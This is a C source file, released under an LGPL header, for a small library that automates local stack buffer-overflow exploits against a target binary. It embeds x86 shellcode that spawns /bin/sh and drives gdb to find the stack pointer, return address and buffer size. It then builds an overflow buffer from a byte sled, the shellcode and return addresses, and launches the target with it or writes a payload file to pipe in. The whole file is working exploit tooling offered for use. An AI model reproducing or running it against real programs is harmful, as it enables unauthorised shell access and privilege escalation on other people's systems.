/*
                  GNU LESSER GENERAL PUBLIC LICENSE
                       Version 2.1, February 1999

 Copyright (C) 1991, 1999 Free Software Foundation, Inc.
     59 Temple Place, Suite 330, Boston, MA  02111-1307  USA
 Everyone is permitted to copy and distribute verbatim copies
 of this license document, but changing it is not allowed.

[This is the first released version of the Lesser GPL.  It also counts
 as the successor of the GNU Library Public License, version 2, hence
 the version number 2.1.]
*/


#include <stdio.h>
#include <string.h>
#include <stdlib.h>
#include <stdarg.h>
#include <malloc.h>
#include <unistd.h>
#include "boegADT.h"

#define NOP	0x90
#define NOP1	0x41 //Yes, this could be a NOP!!!
#define OFFSET	5

char testshell[] = "BBBBBBBBBBBBB";

char shellcode[] =
"\xeb\x17\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b\x89\xf3\x8d"
"\x4e\x08\x31\xd2\xcd\x80\xe8\xe4\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68";


struct boegCDT
{
	ElementType buffer;
	ElementType filename;
};


static void Error(char* str) {
	fprintf(stderr,"%s\n", str);
	exit(EXIT_FAILURE);
}


boegADT newboeg(ElementType filename){
	boegADT boeg;
	boeg=malloc(sizeof(struct boegCDT));
	boeg->buffer=NULL;
	boeg->filename=filename;
	return boeg;
}


int intel_get_sp(void) {
  __asm__("movl %esp, %eax");
}


ElementType return_buffer(boegADT myboeg) {
	if(myboeg->buffer==NULL)
		Error("No buffer.\n");
	return myboeg->buffer;

}


int get_return_address_without_core(boegADT myboeg, int buffersize, const char *arg, ...)
{
	FILE *handle;
	FILE *tmp_handle;
	char tmpfile[11]="gdb_XXXXXX";
	char buffer[1024];
	char nro[15];
	char *aux;
	int ret;

	if(buffersize <= 0 )
		Error("Invalid buffersize input.\n");

	mkstemp(tmpfile);
	if( (tmp_handle=fopen(tmpfile,"w") )==NULL)
		Error("Cannot open input file.\n");

	snprintf(buffer,sizeof(buffer),"set args `perl -e \'printf \"A\"x%d\'` "\
		"\nrun\ninfo register esp",buffersize + OFFSET);
	fwrite(buffer,strlen(buffer),1,tmp_handle);
	fclose(tmp_handle);

	snprintf(buffer,sizeof(buffer),"gdb %s < %s",myboeg->filename,tmpfile);
	handle=popen(buffer,"r");
	while(!feof(handle))
	{
		fgets(buffer,1024,handle);
		if( (aux=strstr(buffer,"esp")) !=  NULL)
		{
			aux=strstr(buffer,"0x");
			ret=strstr(aux,"\t") - aux;
			if(ret>(sizeof(nro)/sizeof(char)))
				Error("mmm, big address");
			strncpy(nro,aux,ret);
			nro[ret]='\0';
			sscanf(nro,"%x",&ret);
			break;
		}
	}
	fclose(handle);
	remove(tmpfile);
	//printf("AAAAAAAAA%x\n",ret);
	return ret-buffersize; 
}


int get_return_address(boegADT myboeg, int buffersize)
{
	FILE *handle;
	FILE *tmp_handle;
	char tmpfile[11]="gdb_XXXXXX";
	char buffer[1024];
	char nro[15];
	char *aux;
	int ret;

	if(buffersize <= 0 )
		Error("Invalid buffersize input.\n");

	mkstemp(tmpfile);
	if( (tmp_handle=fopen(tmpfile,"w") )==NULL)
		Error("Cannot open input file.\n");

	fwrite("info register esp",18,1,tmp_handle);
	fclose(tmp_handle);
	
	snprintf(buffer,sizeof(buffer),"gdb %s core < %s",myboeg->filename,tmpfile);
	handle=popen(buffer,"r");
	while(!feof(handle))
	{
		fgets(buffer,1024,handle);
		if( (aux=strstr(buffer,"esp")) !=  NULL)
		{
			aux=strstr(buffer,"0x");
			ret=strstr(aux,"\t") - aux;
			if(ret>(sizeof(nro)/sizeof(char)))
				Error("mmm, big address");
			strncpy(nro,aux,ret);
			nro[ret]='\0';
			sscanf(nro,"%x",&ret);
			break;
		}
	}
	fclose(handle);
	remove(tmpfile);
	return ret-buffersize;
}



int get_buffersize(boegADT myboeg, const char *funcname)
{
	FILE *handle;
	FILE *tmp_handle;
	char tmpfile[11]="gdb_XXXXXX";
	char buffer[1024];
	char nro[10];
	char *aux;
	int counter=0;
	int i;
		
	mkstemp(tmpfile);
	if( (tmp_handle=fopen(tmpfile,"w") )==NULL)
		Error("Cannot open input file.\n");

	snprintf(buffer,sizeof(buffer),"disas %s\n",funcname);
	fwrite(buffer,strlen(buffer),1,tmp_handle);
	fclose(tmp_handle);

	snprintf(buffer,sizeof(buffer),"gdb %s < %s",myboeg->filename,tmpfile);
	handle=popen(buffer,"r");
	while(!feof(handle))
	{
		fgets(buffer,1024,handle);
		if( (aux=strstr(buffer,"sub")) !=  NULL)
		{
			aux=strstr(buffer,"$0x") + 3;
			i=strstr(aux,",") - aux;
			if(i>(sizeof(nro)/sizeof(char)))
				Error("mmm, big address");
			strncpy(nro,aux,i);
			nro[i]='\0';
			sscanf(nro,"%x",&i);
			counter+=i;
			break;
		}
	}
	fclose(handle);
	remove(tmpfile);
	return counter;
}


static char* load_shellcode(int shellcode_type) {
	switch(shellcode_type) {
		case -1: return testshell; break;
		case 0: return shellcode; break;
		default : return NULL;
	}
}

void load_buffer(boegADT myboeg, int buffersize, int ret, int shellcode_type )
{
	int i;
	char *pos;
	char *Shellcode = load_shellcode(shellcode_type);
	
	if(Shellcode == NULL)
		Error("The selected shellcode doesn't exist");

	myboeg->buffer=malloc( (buffersize + 9 )*sizeof(char));

	if(strlen(Shellcode) >= (buffersize - 8) )
		Error("The shell is too big!! :(");

	for(i=0;i<=buffersize - 1;i++)
		myboeg->buffer[i]=NOP1;
	*(int *) &(myboeg->buffer[i]) = ret;
	*(int *) &(myboeg->buffer[i+=4]) = ret;
	pos=myboeg->buffer + buffersize - (8 + strlen(Shellcode));
	memcpy(pos,Shellcode,strlen(Shellcode));
}


void stdin_local_exp(const char *filename,ElementType element)
{
	FILE *handle;
	if( (handle=fopen("stdin.shell","w"))==NULL )
		Error("Cannot open input file.\n");

	fwrite(element,strlen(element),1,handle);
	fclose(handle);
	printf("\"stdin.shell\" was created.\n");
	printf("Execute this:\t (cat stdin.shell;cat)| %s\n"\
				"And enjoy your ride\n",filename);
}


void local_exploit(boegADT myboeg ,ElementType element ,\
                        int INPUT_TYPE, const char *arg, ...)

{
	int (*fn[2])(const char* , const char* ,... ) = {execl,execlp};

	switch(INPUT_TYPE) {
	case 0: (*fn[INPUT_TYPE])(myboeg->filename,myboeg->filename,element,NULL);
	break;
	
	case 1: stdin_local_exp(myboeg->filename,element);
	break;
	}
	
}

